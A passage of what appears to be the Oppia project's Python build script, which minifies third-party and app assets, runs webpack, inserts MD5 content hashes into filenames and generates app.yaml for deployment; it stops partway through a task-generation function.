import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are corresponded hash value. The paths need to be in posix style,
# as it is interpreted by the `url-interpolation` service, which which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here to since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*'
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build process
# is being run from the deploy script.
if deploy_mode:
content = content.replace('version: default', '')
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
cmd = '%s %s --config %s' % (
common.NODE_BIN_PATH, WEBPACK_FILE, config_path)
subprocess.check_call(cmd, shell=True)
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted file' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
